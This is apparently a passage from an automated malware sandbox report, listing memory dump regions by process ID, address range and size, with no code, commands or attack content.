memory/1644-238-0x0000000003050000-0x0000000003051000-memory.dmpFilesize
4KB
-
memory/1680-318-0x0000000000000000-mapping.dmp
-
memory/1688-194-0x0000000003240000-0x0000000003241000-memory.dmpFilesize
4KB
-
memory/1688-217-0x00000000070F0000-0x00000000070F1000-memory.dmpFilesize
4KB
-
memory/1688-190-0x0000000000000000-mapping.dmp
-
memory/1688-192-0x0000000003240000-0x0000000003241000-memory.dmpFilesize
4KB
-
memory/1688-225-0x00000000070F2000-0x00000000070F3000-memory.dmpFilesize
4KB
-
memory/1772-145-0x0000027FF4490000-0x0000027FF4491000-memory.dmpFilesize
4KB
-
memory/1772-140-0x0000000000000000-mapping.dmp
-
memory/1772-156-0x0000027FF6E50000-0x0000027FF718B000-memory.dmpFilesize
3.2MB
-
memory/1772-157-0x0000027FF4890000-0x0000027FF4891000-memory.dmpFilesize
4KB
-
memory/1772-158-0x0000027FF64C0000-0x0000027FF64C1000-memory.dmpFilesize
4KB
-
memory/1772-166-0x0000027FF6C50000-0x0000027FF6CFC000-memory.dmpFilesize
688KB
-
memory/1772-159-0x0000027FF6E40000-0x0000027FF6E42000-memory.dmpFilesize
8KB
-
memory/1808-178-0x0000000000000000-mapping.dmp
-
memory/1888-212-0x0000000000000000-mapping.dmp
-
memory/2200-302-0x0000000000000000-mapping.dmp
-
memory/2228-207-0x0000000000000000-mapping.dmp
-
memory/2320-136-0x0000000001190000-0x0000000001191000-memory.dmpFilesize
4KB
-
memory/2320-131-0x0000000005350000-0x0000000005351000-memory.dmpFilesize
4KB
-
memory/2320-124-0x00000000011B0000-0x00000000011B1000-memory.dmpFilesize
4KB
-
memory/2320-119-0x0000000000000000-mapping.dmp
-
memory/2532-118-0x0000000003330000-0x0000000003331000-memory.dmpFilesize
4KB
-
memory/2892-204-0x0000000000000000-mapping.dmp
-
memory/3092-325-0x0000000000000000-mapping.dmp
-
memory/3160-214-0x0000000007D00000-0x0000000007D01000-memory.dmpFilesize
4KB
-
memory/3160-183-0x0000000003090000-0x0000000003091000-memory.dmpFilesize
4KB
-
memory/3160-185-0x0000000004A40000-0x0000000004A41000-memory.dmpFilesize
4KB
-
memory/3160-187-0x00000000076A0000-0x00000000076A1000-memory.dmpFilesize
4KB
-
memory/3160-180-0x0000000000000000-mapping.dmp
-
memory/3160-213-0x0000000007062000-0x0000000007063000-memory.dmpFilesize
4KB
-
memory/3160-226-0x0000000007EF0000-0x0000000007EF1000-memory.dmpFilesize
4KB
-
memory/3160-182-0x0000000003090000-0x0000000003091000-memory.dmpFilesize
4KB
-
memory/3160-186-0x0000000007060000-0x0000000007061000-memory.dmpFilesize
4KB
-
memory/3160-218-0x0000000007D30000-0x0000000007D31000-memory.dmpFilesize
4KB
-
memory/3288-174-0x0000000000000000-mapping.dmp
-
memory/3356-189-0x0000000000000000-mapping.dmp
-
memory/3556-175-0x0000000000000000-mapping.dmp
-
memory/3596-179-0x0000000000000000-mapping.dmp
-
memory/3640-340-0x00007FFB93FB0000-0x00007FFB93FB2000-memory.dmpFilesize
8KB
-
memory/3656-184-0x0000000000000000-mapping.dmp
-
memory/3692-211-0x0000000000960000-0x0000000000961000-memory.dmpFilesize
4KB
-
memory/3692-230-0x00000000067C2000-0x00000000067C3000-memory.dmpFilesize
4KB
-
memory/3692-210-0x0000000000000000-mapping.dmp
-
memory/3692-220-0x00000000067C0000-0x00000000067C1000-memory.dmpFilesize
4KB
-
memory/3692-216-0x0000000000960000-0x0000000000961000-memory.dmpFilesize
4KB
-
memory/3968-155-0x0000000000000000-mapping.dmp
-
memory/4048-326-0x0000000000000000-mapping.dmp
-
memory/4108-227-0x0000000000000000-mapping.dmp
-
memory/4112-308-0x0000000000000000-mapping.dmp
-
memory/4132-314-0x0000000000000000-mapping.dmp
-
memory/4144-228-0x0000000000000000-mapping.dmp
-
memory/4184-232-0x0000000000000000-mapping.dmp
-
memory/4184-275-0x0000000006A10000-0x0000000006A11000-memory.dmpFilesize
4KB
-
memory/4184-242-0x0000000000960000-0x0000000000961000-memory.dmpFilesize
4KB
-
memory/4184-281-0x0000000006A12000-0x0000000006A13000-memory.dmpFilesize
4KB
-
memory/4200-311-0x0000000000000000-mapping.dmp
-
memory/4300-237-0x0000000000000000-mapping.dmp
-
memory/4384-321-0x0000000000000000-mapping.dmp
-
memory/4448-247-0x0000000000000000-mapping.dmp
-
memory/4468-304-0x0000000000000000-mapping.dmp
-
memory/4568-254-0x0000000000000000-mapping.dmp
-
memory/4576-306-0x0000000000000000-mapping.dmp
-
memory/4624-291-0x0000000004ED0000-0x0000000004ED1000-memory.dmpFilesize
4KB
-
memory/4624-278-0x0000000004ED2000-0x0000000004ED3000-memory.dmpFilesize
4KB
-
memory/4624-258-0x0000000000000000-mapping.dmp
-
memory/4644-305-0x0000000000000000-mapping.dmp
-
memory/4668-285-0x0000000006ED0000-0x0000000006ED1000-memory.dmpFilesize
4KB
-
memory/4668-260-0x0000000000000000-mapping.dmp
-
memory/4668-294-0x0000000006ED2000-0x0000000006ED3000-memory.dmpFilesize
4KB
-
memory/4732-262-0x0000000000000000-mapping.dmp
-
memory/4740-307-0x0000000000000000-mapping.dmp
-
memory/4760-264-0x0000000000000000-mapping.dmp
-
memory/4816-269-0x0000000000000000-mapping.dmp
-
memory/4820-317-0x0000000000000000-mapping.dmp
-
memory/4876-309-0x0000000000000000-mapping.dmp
-
memory/4892-272-0x0000000000000000-mapping.dmp
-
memory/4904-312-0x0000000000000000-mapping.dmp
-
memory/4908-273-0x0000000000000000-mapping.dmp
-
memory/5016-313-0x0000000000000000-mapping.dmp
-
memory/5088-287-0x0000000000000000-mapping.dmp
-
memory/5112-289-0x0000000000000000-mapping.dmp